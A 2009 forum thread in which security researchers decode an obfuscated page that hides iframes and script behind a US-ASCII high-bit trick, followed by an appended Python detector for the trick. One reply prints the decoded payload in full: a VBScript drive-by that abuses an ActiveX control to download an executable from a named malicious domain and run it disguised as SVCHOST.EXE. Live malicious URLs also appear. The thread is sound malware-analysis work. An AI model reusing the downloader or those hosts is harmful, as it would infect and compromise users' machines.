Author Topic: Malicious code?  (Read 6141 times)


June 15, 2009, 08:23:27 pm

JohnC

masteranalyse.com/dark.htm

Code:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title></title>
</head><body>
 㽰 轰 徊  轰 徊  轱 徊  轱 徊  轱 徊  轱 徊
</body></html>

http://www.virustotal.com/analisis/e46e839e5f3c57e3af507937af2a1b8dec90e23a70473e17bf53cd52c17827ee-1245097235

June 15, 2009, 09:21:48 pm
Reply #1

MysteryFCM

Doesn't appear to be malicious?
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 15, 2009, 11:05:09 pm
Reply #2

CkreM

looks like just some unidentified characters to me
Mal-Aware

June 16, 2009, 02:17:32 am
Reply #3

miyoko

It's actually malicious code; it has 6 iframes inside.

The method I use to decode it is to remove all the , host it and run it in a browser; the iframes will show up.

in US-ASCII is <

Don't know if there's any easy way to decode it.

June 16, 2009, 02:33:40 am
Reply #4

CkreM

It's actually malicious code; it has 6 iframes inside.

The method I use to decode it is to remove all the , host it and run it in a browser; the iframes will show up.

in US-ASCII is <

Don't know if there's any easy way to decode it.


nice :)
 
Code:
iframe src=06014.htm width=0 height=0>/iframe> iframe src=Ajax.htm width=0 height=0>/iframe> iframe src=Pps.htm width=1 height=1>/iframe> iframe src=Reader.htm width=1 height=1>/iframe> iframe src=Storm.htm width=1 height=1>/iframe> iframe src=Web.htm width=1 height=1>/iframe>

masteranalyse.com/Ajax.htm
masteranalyse.com/Pps.htm
masteranalyse.com/Reader.htm
masteranalyse.com/Storm.htm
masteranalyse.com/Web.htm
masteranalyse.com/06014.htm

need to decode each of them also...
Mal-Aware

June 16, 2009, 12:28:27 pm
Reply #5

MysteryFCM

Nice one miyoko, cheers :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 16, 2009, 03:00:11 pm
Reply #6

SysAdMini

US-ASCII uses only 7 bits. The highest bit was set by the author purely for obfuscation.
The browser honours the declared charset and ignores the highest bit.

You can decode it in Malzilla using this function:
Code:
// y holds the obfuscated page body pasted from the sample; every character has its high bit set
y = " 㽰 轰 徊 轰 徊 轱 徊 轱 徊 轱 徊 轱 徊";
for(i=0;i<y.length;i++) {
  // 127 & code keeps only the low 7 bits, which is exactly what the browser does for a US-ASCII page
  document.write(String.fromCharCode(127 & y.charCodeAt(i)));
}
Ruining the bad guy's day

June 17, 2009, 05:24:52 pm
Reply #7

SysAdMini

I was wondering if it's a known issue.
It is. I've found a two-year-old article about it.

http://www.avertlabs.com/research/blog/index.php/2007/04/08/malware-exploits-microsoft-feature-along-with-vulnerabilities/

It seems that only IE is vulnerable.
Here is a test page to check your browser.

http://www.malwaredomainlist.com/test/7bits.htm
Ruining the bad guy's day

June 17, 2009, 05:45:24 pm
Reply #8

MysteryFCM

Just loaded the test page in Avant with JS enabled, and then in IE8 itself, and no message box :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

June 17, 2009, 10:31:21 pm
Reply #9

JohnC

I recall coming across something similar in the past, but didn't really know how it worked and didn't bother to question it. I do remember it had detections, though. The title of the page was normally something like "Super IE 0day".

8568985.com/garegky/egk.htm

Code:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title>super IE 0Day</title>
</head>
<body>
 形   ս𺯯墍   ⢦墦㢦 ᢦ䢬 㢦󢦢颦Ĺõİâòųн͢㢦󢦢梦آ̢͢ȢԢТ   Ь ǢԢ լ 半䍊形֢ȢԮŢ֢ȢԮӢ   颦𢦢Ƣ颦墦墦Ϣ墦   ɮ򨲩ɮ婍ɮ󩍊䢍½䢦⢦󢦢墦潢Ӣ袦墦좦좦𢦢𢦢좦颦㢦ᢍͽ   ͬڮ影ڮڮ ڮ 嬲ڮ半ڮ彲ڮڮ    榢   㢢Ӣ좢榢Ӯ 妢榢   碍ڮ 󬲍ڮ半   榢 ᬢ
</body>
</html>

http://www.virustotal.com/analisis/de7da2635da6a92e843beea82101bdfcb9b1aecc48404f8be25f8211dd06c87b-1245277903

June 26, 2009, 09:30:40 am
Reply #10

philipp

Code:
philipp@desktop:~/analysis$ curl -s http://8568985.com/garegky/egk.htm | perl -pe 'tr/\200-\377/\000-\177/'
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />
<title>super IE 0Day</title>
</head>
<body>
<Script Language="VBScript">
On Error Resume Next
CnLRU="http://www.8568985.com/garegky/jpmm.exe"
Set A0 = document.createElement("ob"&"je"&"c"&"t")
A0.SetAttribute "cla"&"ssid", "c"&"ls"&"i"&"d:BD9"&"6C55"&"6-65"&"A3-11D0"&"-983A-00C"&"04FC29"&"E36"
sHTTP="M"&"ic"&"ro"&"s"&"of"&"t"&".X"&"M"&"L"&"H"&"TT"&"P"
Set Pop = A0.CreateObject(sHTTP,"")
Pop.Open "G"&"ET", CnLRU, False
Pop.Send
Exe="SV"&"CH"&"0ST.EXE"
Vbs="SV"&"CH"&"OST.VBS"
Set FPI = A0.createobject("Scri"&"p"&"ting.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","")
Set sTmp = FPI.GetSpecialFolder(2)
Exe=FPI.BuildPath(sTmp,Exe)
Vbs=FPI.BuildPath(sTmp,Vbs)
AA="A"&"d"
AB="o"&"d"&"b"&"."&"s"&"tre"&"am"
fffff="S"&"h"&"e"&"l"&"l"&"."&"A"&"p"&"p"&"l"&"i"&"c"&"a"
AdM=AA&AB
Set ZZ = A0.createobject(AdM,"")
ZZ.type=1
ZZ.Open
ZZ.Write Pop.ResponseBody
ZZ.Savetofile Exe,2
ZZ.Close
ZZ.Type=2
ZZ.Open
ZZ.WriteText "On Error Resume Next"&vbCrLf&"Set S = CreateObject(""Wsc""&""ript.S""&""hell"")"&vbCrLf&"S.Run ("""&Exe&""")"&vbCrLf&"Set S = Nothing"
ZZ.Savetofile Vbs,2
ZZ.Close
Set MircoLonga = A0.createobject(fffff&"tion","")
MircoLonga.ShellExecute Vbs,aaa,aaa,"Open",0
</Script>
</body>
</html>

edit: changed quote- to code-tags to disable links
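The 7-bit trick SysAdMini explains above, and that philipp's perl one-liner applies, as an added example that is not code from the thread: a small Python analyser that flags a page declaring charset=US-ASCII yet containing bytes with the high bit set, strips that bit the way IE did, and then lists the hidden iframes and script tags that become visible. It goes a step beyond the thread by pairing the decode with the detection check (declared charset versus the bytes actually present), which is the signal a scanner or proxy filter can act on. The sample page is constructed here from the iframe names posted earlier; the function names are mine.

```python
"""Detect and undo the 'US-ASCII with the high bit set' obfuscation.

Added example, not from the thread. The sample page below is constructed
to mimic the posted masteranalyse.com page; only the iframe file names
come from the thread.
"""
import re

# Declared charset in the page header (the lie the obfuscation relies on).
DECLARED_ASCII = re.compile(rb'charset\s*=\s*["\']?us-ascii', re.IGNORECASE)
IFRAME = re.compile(rb'<iframe\b([^>]*)>', re.IGNORECASE)
ATTR = re.compile(rb'(\w+)\s*=\s*["\']?([^\s"\'>]+)')
SCRIPT_TAG = re.compile(rb'<script\b[^>]*>', re.IGNORECASE)


def obfuscate_7bit(payload: bytes) -> bytes:
    """Set the high bit on every byte; used here only to build the constructed sample."""
    return bytes(b | 0x80 for b in payload)


def strip_high_bit(data: bytes) -> bytes:
    """Keep the low 7 bits of each byte, mirroring what IE did for a US-ASCII page
    (same mapping as perl's tr/\\200-\\377/\\000-\\177/ and Malzilla's 127 & code)."""
    return bytes(b & 0x7F for b in data)


def hidden_iframes(html: bytes) -> list:
    """Return the src of every iframe whose width or height is 0 or 1 pixels."""
    found = []
    for m in IFRAME.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR.findall(m.group(1))}
        if attrs.get(b'width') in (b'0', b'1') or attrs.get(b'height') in (b'0', b'1'):
            found.append(attrs.get(b'src', b'').decode('ascii', 'replace'))
    return found


def analyse(raw: bytes) -> dict:
    """Flag the charset/byte mismatch, decode if needed, and report what was hidden."""
    declared_ascii = DECLARED_ASCII.search(raw) is not None
    high_bit = sum(1 for b in raw if b >= 0x80)
    # A genuinely US-ASCII page has no byte >= 0x80; the mismatch is the detection signal.
    suspicious = declared_ascii and high_bit > 0
    decoded = strip_high_bit(raw) if suspicious else raw
    return {
        'declared_us_ascii': declared_ascii,
        'high_bit_bytes': high_bit,
        'suspicious': suspicious,
        'hidden_iframes': hidden_iframes(decoded),
        'script_tags': len(SCRIPT_TAG.findall(decoded)),
        'decoded': decoded,
    }


# Constructed sample: the body is obfuscated exactly as the posted page was.
SAMPLE_BODY = (b'<iframe src=Ajax.htm width=0 height=0></iframe>'
               b'<iframe src=Pps.htm width=1 height=1></iframe>')
SAMPLE_PAGE = (b'<html><head>'
               b'<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" />'
               b'<title></title></head><body>'
               + obfuscate_7bit(SAMPLE_BODY) +
               b'</body></html>')


if __name__ == '__main__':
    report = analyse(SAMPLE_PAGE)
    print('declared US-ASCII:', report['declared_us_ascii'])
    print('bytes with high bit set:', report['high_bit_bytes'])
    print('suspicious:', report['suspicious'])
    print('hidden iframes:', report['hidden_iframes'])
    print('script tags after decode:', report['script_tags'])
    print(report['decoded'].decode('ascii'))
```

Feed `analyse()` the raw bytes fetched from a suspect URL (not a text-decoded string, or the high bits are already lost); a page that declares US-ASCII but returns a non-zero `high_bit_bytes` count is worth a closer look regardless of what the decode turns up.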